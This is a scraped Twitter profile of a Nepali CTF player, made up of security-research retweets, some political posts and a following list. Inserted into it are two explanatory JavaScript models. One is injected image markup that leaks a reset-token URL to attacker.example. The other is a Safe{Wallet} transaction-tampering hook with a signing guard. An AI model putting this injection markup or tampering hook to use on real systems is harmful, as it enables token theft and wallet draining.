Dipendra Shrestha @StructHack
Interested in web... CTF with Hack@Sec. Nepal🇳🇵 Joined July 2018
Tweets 148 · Followers 137 · Following 279 · Likes 2K
We have published a technical blog post by security researcher RyotaK (@ryotkak). This time we discovered and reported a vulnerability that allows the permission controls of Claude Code GitHub Actions to be bypassed via an external GitHub Issue, letting the workflow's permissions be abused, together with a misconfiguration that accompanies it. The vulnerability itself has been fixed in v1.0.94, but the misconfiguration has to be addressed in each repository, so if you use this product we recommend reviewing your configuration and checking your execution logs. flatt.tech/research/posts…
Posting a mini XSS challenge! Goal is to pop an alert. I believe this trick is not well known. Intended solution is chrome only. Thanks to @kevin_mizu for beta testing! Don't post solutions in the thread; DM only! xss.hashkitten.io/xss1.html
That's my chain — a full chain w/ logic bugs only! No memory corruption, no AI, and of course no collisions at all 😉
Confirmed! Orange Tsai (@orange_8361) of DEVCORE Research Team (@d3vc0r3) chained 4 logic bugs to achieve a sandbox escape on Microsoft Edge, earning $175,000 and 17.5 Master of Pwn points. Full win! #Pwn2Own #P2OBerlin
Nah, I'm just not gonna run npm install anymore.
We responsibly disclosed the issue to @github, who deployed a fix on GitHub.com the same day (!) and released patches for all supported GHES versions. GitHub Enterprise Server customers are strongly encouraged to update immediately.
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
@DeSolti I feel ashamed to have studied in the same class as you. What was wrong with showing it the way it actually was? "timing this, timing that"... If something had happened to someone in your own family, you would probably have understood.
I built an entire x86 CPU emulator in CSS (no JavaScript). You can write programs in C, compile them to x86 machine code with GCC, and run them inside CSS.
I’ve been digging into HTTP Trailers and found some new smuggling techniques: sebsrt.xyz/blog/trailing-…
Chrome implements referrerpolicy on <input type="image">, despite it not being in the HTML spec. Like on the in-spec elements, it takes precedence over the document policy for that request and can be abused to leak the page URL via the Referer header. storage.googleapis.com/nowaskyjr/a/in…
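The behaviour in the tweet above, as an added example that is not code from the tweet, from Chromium or from the linked write-up: a small model of the Referrer Policy algorithm (policy names and semantics as in the W3C Referrer Policy spec) that shows what leaks when an element-level referrerpolicy overrides a restrictive document policy such as `<meta name="referrer" content="no-referrer">`. The victim URL, attacker host and injected markup are constructed for the example, and the "localhost counts as trustworthy" shortcut is a simplification of the spec's potentially-trustworthy check.

```javascript
// Added example (not from the tweet or from Chromium): a model of the
// Referrer Policy algorithm, used to show why an element-level
// referrerpolicy that overrides a restrictive document policy leaks the
// page URL. Policy semantics follow the W3C Referrer Policy spec.

// Strip credentials and the fragment, as the spec does before a URL is
// used as a referrer.
function stripForReferrer(url) {
  const u = new URL(url);
  u.username = "";
  u.password = "";
  u.hash = "";
  return u.href;
}

// Simplification of the spec's "potentially trustworthy" check.
function isPotentiallyTrustworthy(u) {
  return u.protocol === "https:" || u.hostname === "localhost";
}

// Returns the Referer value a browser would send, or null for no header.
function computeReferer(pageUrl, requestUrl, policy) {
  const page = new URL(pageUrl);
  const req = new URL(requestUrl);
  const full = stripForReferrer(pageUrl);
  const originOnly = page.origin + "/";
  const sameOrigin = page.origin === req.origin;
  const downgrade = isPotentiallyTrustworthy(page) && !isPotentiallyTrustworthy(req);

  switch (policy) {
    case "no-referrer":
      return null;
    case "no-referrer-when-downgrade":
      return downgrade ? null : full;
    case "origin":
      return originOnly;
    case "origin-when-cross-origin":
      return sameOrigin ? full : originOnly;
    case "same-origin":
      return sameOrigin ? full : null;
    case "strict-origin":
      return downgrade ? null : originOnly;
    case "unsafe-url":
      return full;
    case "":
    case "strict-origin-when-cross-origin":
    default:
      // Browser default: full URL same-origin, origin cross-origin, nothing on downgrade.
      if (sameOrigin) return full;
      return downgrade ? null : originOnly;
  }
}

// The element's own policy wins over the document policy whenever it is set;
// the tweet reports Chrome applying this to <input type="image"> as well.
function effectiveReferer(pageUrl, requestUrl, documentPolicy, elementPolicy) {
  const policy = elementPolicy || documentPolicy;
  return computeReferer(pageUrl, requestUrl, policy);
}

// Constructed scenario: a page that relies on a no-referrer document policy
// to keep a secret in its URL out of Referer headers.
const PAGE = "https://victim.example/reset?token=s3cr3t#frag";
const ATTACKER_IMG = "https://attacker.example/collect.png";

// The markup an attacker would need to inject: an image input carrying its
// own referrerpolicy attribute (hypothetical injection point).
const INJECTED_HTML =
  `<input type="image" src="${ATTACKER_IMG}" referrerpolicy="unsafe-url">`;

function demo() {
  return {
    withDocumentPolicyOnly: effectiveReferer(PAGE, ATTACKER_IMG, "no-referrer", ""),
    withElementOverride: effectiveReferer(PAGE, ATTACKER_IMG, "no-referrer", "unsafe-url"),
  };
}
```

The practical check this suggests: an HTML sanitizer that only strips script-bearing attributes is not enough on pages whose URL carries secrets, since `referrerpolicy` on an injected image-bearing element is sufficient to override the document policy for that one request.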
Cross-Site ETag Length Leak blog.arkark.dev/2025/12/26/eta… I just posted the author writeup for impossible-leak in SECCON CTF 14 Quals. As far as I know, this is a new XS-Leak technique! The ETag header can become a side channel :)
Dear Gen Z, through your contribution and sacrifice the country has seen change. Heartfelt tribute to the brave martyrs. Your contribution is invaluable and will always guide future generations on the path of patriotism and a sense of duty. Boundless respect to you. I wish the injured a speedy recovery.
You turned out to be the father of your hired thugs. If you had ever truly been a father, you would have understood the pain of a son's or daughter's death. The world had never seen such terrorism. You could not even become a human being, let alone a leader; you are a terrorist. #kpoliisterriorist
Turns out my #PHRACK article is live! 🔥 > The Art of PHP — My CTF Journey and Untold Stories! Kinda a love letter to those CTF players & PHP nerds! Hope all the credit goes to the right ppl. Also huge thanks to @0xdea for not forgetting me, @guitmz for the edits, and the @Phrack crew for keeping it real! 🎉 phrack.org/issues/72/5_md…
I'm happy to release a script gadgets wiki inspired by the work of @slekies, @kkotowicz, and @sirdarckcat in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4
It is pretty interesting that as I age and geohot ages, I end up noticing that we agree on more things than I thought in the past. This here is a good read: geohot.github.io//blog/jekyll/u… -- it's
I think many people are familiar with the topic of blind CSS exfiltration, especially after the post by @garethheyes However, an important update has occurred since then, which I wrote below ->
So, this is how Lazarus drained 1.5 billion: 1) malicious JS injected into Safe{Wallet} at app.safe.global/_next/static/c… (because apparently one of the NK devs just casually pushed it to production 🤡) 2) the JS modified executeTransaction() only if the signer was in a predefined list (Bybit's multisig owners). 3) the modified transaction now sets operation: 1 (delegatecall) to the attacker address instead of a normal call. 4) the delegatecall hits the attacker contract, which changed the Safe contract's first storage slot, which is masterCopy, to another attacker contract. 5) the new masterCopy contract contained sweepETH() & sweepERC20(), draining $1.5B
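The chain in the post above, as an added example that is constructed for this page and is not the injected code, the Safe{Wallet} app or Bybit's setup. It models two parts of the chain: the front-end hook that rewrites a transaction only for signers on a predefined list, and a toy storage model showing why a DELEGATECALL issued from the proxy lets the callee overwrite the proxy's storage slot 0 (masterCopy). The pre-signing guard at the end is the check a signer or hardware-wallet policy can apply to the payload actually being signed, independent of what the web UI rendered. All addresses and the sample transaction are made up; the `operation` encoding (0 = CALL, 1 = DELEGATECALL) is the Safe contract's.

```javascript
// Added example (constructed; not the injected code, the Safe{Wallet} app or
// Bybit's setup). Models the front-end tampering hook, a toy EVM storage view
// of CALL vs DELEGATECALL, and a pre-signing guard.
// `operation` values follow the Safe contract: 0 = CALL, 1 = DELEGATECALL.

const CALL = 0;
const DELEGATECALL = 1;

// Illustrative addresses, not the real ones.
const TARGETED_SIGNERS = new Set(["0xaaaa", "0xbbbb"]);
const ATTACKER_CONTRACT = "0xdead";
const NEW_MASTERCOPY = "0xd00d";
const LEGIT_MASTERCOPY = "0x1234";

// Benign front-end path: pass the transaction through unchanged.
function executeTransaction(signer, tx) {
  return { signer, tx };
}

// Tampering hook in the shape the post describes: only signers on a
// predefined list get their CALL rewritten into a DELEGATECALL to the
// attacker contract; everyone else sees the original behaviour.
function wrapWithTamper(original) {
  return function tampered(signer, tx) {
    if (!TARGETED_SIGNERS.has(signer)) return original(signer, tx);
    return original(signer, { ...tx, to: ATTACKER_CONTRACT, operation: DELEGATECALL });
  };
}

// Toy EVM: the proxy keeps masterCopy in storage slot 0. CALL runs the
// callee's code against the callee's own storage; DELEGATECALL runs it
// against the caller's storage, which is what makes slot 0 reachable.
const CONTRACTS = {
  "0x3333": { storage: {}, run: (s) => { s[1] = "received"; } },
  [ATTACKER_CONTRACT]: { storage: {}, run: (s) => { s[0] = NEW_MASTERCOPY; } },
};

// Executes tx from the proxy and returns the proxy's masterCopy afterwards.
function execOnProxy(proxy, tx) {
  const callee = CONTRACTS[tx.to];
  const storage = tx.operation === DELEGATECALL ? proxy.storage : callee.storage;
  callee.run(storage);
  return proxy.storage[0];
}

// Pre-signing guard: a Safe used for plain transfers should never be asked
// to sign a DELEGATECALL, and never one to a target outside an allowlist.
function checkBeforeSigning(tx, allowedDelegateTargets = new Set()) {
  const problems = [];
  if (tx.operation === DELEGATECALL) {
    problems.push("operation is DELEGATECALL (1); expected CALL (0)");
    if (!allowedDelegateTargets.has(tx.to)) {
      problems.push(`delegatecall target ${tx.to} is not allowlisted`);
    }
  } else if (tx.operation !== CALL) {
    problems.push(`unknown operation ${tx.operation}`);
  }
  return { ok: problems.length === 0, problems };
}

// Constructed sample: a routine transfer from a multisig owner.
const ORIGINAL_TX = { to: "0x3333", value: "1", data: "0x", operation: CALL };

function demo() {
  const compromised = wrapWithTamper(executeTransaction);
  const seenBySigner = compromised("0xaaaa", ORIGINAL_TX).tx; // targeted owner
  const seenByOther = compromised("0xcccc", ORIGINAL_TX).tx;  // anyone else

  const proxyAfterOriginal = { storage: { 0: LEGIT_MASTERCOPY } };
  const proxyAfterTampered = { storage: { 0: LEGIT_MASTERCOPY } };
  execOnProxy(proxyAfterOriginal, ORIGINAL_TX);
  execOnProxy(proxyAfterTampered, seenBySigner);

  return {
    otherSignersUnaffected: seenByOther.operation === CALL && seenByOther.to === ORIGINAL_TX.to,
    masterCopyAfterOriginal: proxyAfterOriginal.storage[0],
    masterCopyAfterTampered: proxyAfterTampered.storage[0],
    guardOnOriginal: checkBeforeSigning(ORIGINAL_TX),
    guardOnTampered: checkBeforeSigning(seenBySigner),
  };
}
```

The point of the guard is that it inspects the `operation` and `to` fields of the payload being signed rather than anything the web front end displays; a hook that only fires for a handful of signers is invisible to everyone else, so the check has to live on the signing side.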
Bybit Hack Forensics Report As promised, here are the preliminary reports of the hack conducted by @sygnia_labs and @Verichains Screenshotted the conclusion and here is the link to the full report: docsend.com/view/s/rmdi832…
1NFOS3C @W4RN1NG12
1 Followers 39 Following
Leverage 12 @12Leverage
44 Followers 3K Following
noone @Kariem_Alaa_
11 Followers 272 Following
zzzzzz @mynameisskool
6 Followers 153 Following
Rabindra Raj Sah @Rabindrarajshah
27 Followers 87 Following
Sagar Neupane @SagarNe30192419
12 Followers 340 Following
Ismail Arabi @IsmailArabi18
73 Followers 2K Following
Nabin Kafle @kaflenabin75
36 Followers 184 Following
Hack@Sec Official @hackasec
48 Followers 58 Following We ( Play | Build | Organize ) CTF. CTF Team: https://t.co/V6yWbHBLbQ For Sponsorship: [email protected]
RomonaPappas @PappasRomo97100
27 Followers 2K Following
Luke Hodgepodge @Hodgepodge7402
3 Followers 71 Following
Dhungana.04 @BishwasDhu57624
0 Followers 46 Following
Hari Bhadur @bhadurh69
0 Followers 38 Following
prashant shrestha @prashantstha17
54 Followers 190 Following
Nitesh thapa @Nitesht36129705
19 Followers 140 Following
Aayush Budhathoki @AayushB17272821
4 Followers 91 Following They believe in God, I believe in God Particles.
R......k @ROSHANKUDAVE3
457 Followers 526 Following pro humanity, anti everything that causes pain and suffering.... believe in 🕊️
fdxd @0xfdxd
1 Followers 222 Following
JustinBmz @Justin85563950
654 Followers 4K Following 22Y/o||No Certifications||Reading new bug bounty blogs applying on websites||Digital Marketing Specialist||Part Time Bug Hunter||Coder||AI Enthusiast||
Better call Anish @bettercallanish
1K Followers 709 Following Young (not so now), dumb ( cricket fan) , broke ( Engineer)
I_am_Bishal @C15C01337
2K Followers 3K Following Security Research Engineer 💂 Founder of CTF Team: Hack@Sec 🇳🇵 Crypto and Web w/@hackasec 🕸️ Blackhat MEA 2023/24/25 CTF Finalist 🎩 BBH at Hacker0x01 🐞🇳🇵
astitwo pandey @astitwo_pandey
7 Followers 207 Following
jexar jexar @JexarJ
4 Followers 388 Following
Nishit Barbhaya @Nishit369
1 Followers 42 Following
rachel david @racheld51074538
152 Followers 899 Following
Hailey Smith @HaileyS41499025
33 Followers 158 Following Cryptocurrency investor💱 Business owner Day trader 📈 Learn how to EARN extra INCOME daily , message me now
Zeeshan @zeeshan1338
396 Followers 6K Following Ethical Hacker ! Security Researcher And Software Engineer
Dheeraj Joshi @dheerajhere
797 Followers 2K Following 🦊 Staff Frontend Engineer. Interested in security, public speaking, fifa and coffee ☕️
Ismail Hossain @0x1ismailhridoy
0 Followers 237 Following
Mukesh @mukezhz
46 Followers 360 Following The thing we hate the most about recursion is what we hate the most about recursion. - recursion 😆
Sabin Timalsina... @the_sansab
60 Followers 150 Following
Jubayer Ahmed Rhyme @Jub4y3r_3x009
230 Followers 3K Following Asian attacker, cybersecurity enthusiast | _-_ | learner | bug bounty hunter Web Application Security Researchers At Hackerone & Bugcrowd
BrunoZero @BrunoModificato
2K Followers 432 Following CTFer for: @Water_Paddler / Security auditor @osec_io my writeups: https://t.co/XurIhbWdj7 24y
phys @cffaedfe
201 Followers 25 Following
Gaurav Jha @pyderator
27 Followers 389 Following Full Stack Web Developer || Typescript Enthusiastic || GraphQL Enthusiastic || Cyber Security Enthusiastic || Bug Hunter
hashkitten @hash_kitten
2K Followers 178 Following vulnerability research @assetnote // hacking // codegolf // ctf with 🛹🐶
castilho @castilho101
1K Followers 258 Following Security Researcher at @ethiack CTF player for @xstf_team
Socket @SocketSecurity
22K Followers 5K Following Socket is the #1 software supply chain security platform. Next-gen SCA + SBOM + 0-day prevention. LOVED BY DEVELOPERS. 👀 @npm_malware
RyotaK @ryotkak
11K Followers 660 Following Security researcher? | Icon: @MelvilleTw | Private: @RyotaK_Private | Misskey: https://t.co/63E5Rpv2pk | Blog: https://t.co/c7NFQXhV90
Security Bug Aggregat... @BugsAggregator
3K Followers 1 Following Aggregate disclosed Chromium security bugs.
Samuel Groß @5aelo
25K Followers 524 Following Working on Project Zero, Big Sleep, and V8 Security. Personal account. Also @[email protected] and https://t.co/aVitnPjBie
Paul Seekamp @nullenc0de
17K Followers 628 Following I spend a significant amount of time reading security stuff. Co-Founder/Partner @CoastlineCyber https://t.co/ZQT5L8q2RO
Edouard Bochin @le_douds
357 Followers 79 Following
sebsrt @s3bsrt
722 Followers 542 Following I like to break stuff | Web Vuln Research & CTF @ARESxCTF @aboutblankets
RewriteLab @RewriteLab
443 Followers 15 Following A specialized research team focused on web security vulnerabilities and exploitation techniques
Ark @arkark_
2K Followers 883 Following Into experimental/deprecated features | CTF player | ex-traP
Z-Library @ZLib_Official
13K Followers 1 Following Official Twitter Account Of https://t.co/nlqXJzCDoR A.K.A former https://t.co/i8tnN6gkRS
hasherezade @hasherezade
91K Followers 954 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Mandiant (part of Goo... @Mandiant
129K Followers 4K Following We’re determined to make organizations secure against cyber threats and confident in their readiness.
SuperFashi @SuperFashi1
2K Followers 708 Following Acceleration is a secular substitute for eternity.
Sin__ @mztropics
1K Followers 682 Following Binary reverse engineering/cybercrime investigations. Also interested in UAP/NHI.
nickharbour @nickharbour
5K Followers 222 Following Reverse Engineer with Google Cloud's FLARE Team. Organizer of the Flare-On challenge.
DeepComputing @DeepComputingio
1K Followers 276 Following Official account of DeepComputing. Turning RISC-V into Reality! Our community: https://t.co/lPorkbQNdN
Rebane @rebane2001
15K Followers 2K Following 🇪🇪🏳️⚧️ | Archivist | 12 CVEs in Chrome | CSS sophomore | MapartCraft | Puppy | Horse | rebane2001#3716 | Lyra (she/her) 🦊 @[email protected]
Gal Weizman @WeizmanGal
2K Followers 561 Following Security Researcher of Browsers, JavaScript, Web and AI • Created SnowJS (acquired by @metamask’s LavaMoat)
Roy @im_roy_lee
203K Followers 2K Following ceo @cluely | kicked out of columbia, harvard, community college graduate
Jorian @J0R1AN
2K Followers 420 Following Normalize being weird. (also here: https://t.co/cr9Y0kDEBi)
XBOW @Xbow
12K Followers 13 Following Bringing AI to offensive security by autonomously finding and exploiting web vulnerabilities. https://t.co/D5Mco1tAKe
Brendan Dolan-Gavitt @moyix
33K Followers 6K Following Building offsec agents: https://t.co/G9EtnC2Gl3 PGP https://t.co/3WXr0RfRkv
slonser @slonser_
5K Followers 205 Following Co-Founder @neploxaudit. CTF team @C4TBuTS4D Security Researcher.
Hacktron AI @HacktronAI
4K Followers 10 Following Hacktron is an autonomous vulnerability hunter for ambitious engineering teams. Built by world-class security researchers. Powered by one principle: PoC || GTFO
Freya Holmér @FreyaHolmer
125K Followers 1K Following ⭕ I made Shapes & Shader Forge 🔥 shader sorceress 🎨 artist 📏 math influencer 💜 twitch partner 📡 ex-founder of @NeatCorp banner: @YO_SU_RA
Justin Gardner @Rhynorater
37K Followers 2K Following Christian | Full-time Bug Bounty Hunter | Host of @ctbbpodcast | Advisor @CaidoIO | 4x LHE MVH | 🗣️ English, 日本語 | ♥️ @mariahchan_ ♥️
JS0N Haddix @Jhaddix
176K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Harel @H4R3L
2K Followers 454 Following Professional Vulnerability Developer | Wannabe Security Researcher
Blaklis @Blaklis_
12K Followers 80 Following Security researcher - my researchs will be on https://t.co/2PnyCvqAIm Mostly inactive, soon replicated from BSKY.
Lupin @0xLupin
18K Followers 756 Following Roni Carta alias Lupin. Founder & CEO @ Depi. R&D. Red Teamer. Bug Hunter. Musician 🤘
ch @chybeta
14K Followers 5K Following open to bug bounty collaboration @HackenProof Security Researcher Just dm https://t.co/VVU1OV5yz6
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Smaran Chand @smaranchand
1K Followers 124 Following I act like a hacker but I am not & I tweet about Application & Cloud Security.
Youssef (s3c) @s3c_krd
10K Followers 547 Following Security researcher & Ambassador at Hackerone. Founder @haxeye_ #bugbounty #hacker #bugbounytips
crazyman @crazyman823886
1K Followers 1K Following CTFer / APT hunter / RedTeam / BlueTeam the member of @r3kapig the leader of @ShadowChasing1 CVE:CVE-2022-30190 pre account @CrazymanArmy
Google DeepMind @GoogleDeepMind
1.5M Followers 279 Following The engine room of @Google. Building AI safely and responsibly to solve the world’s most complex problems. Join us: https://t.co/jUHQA27iBL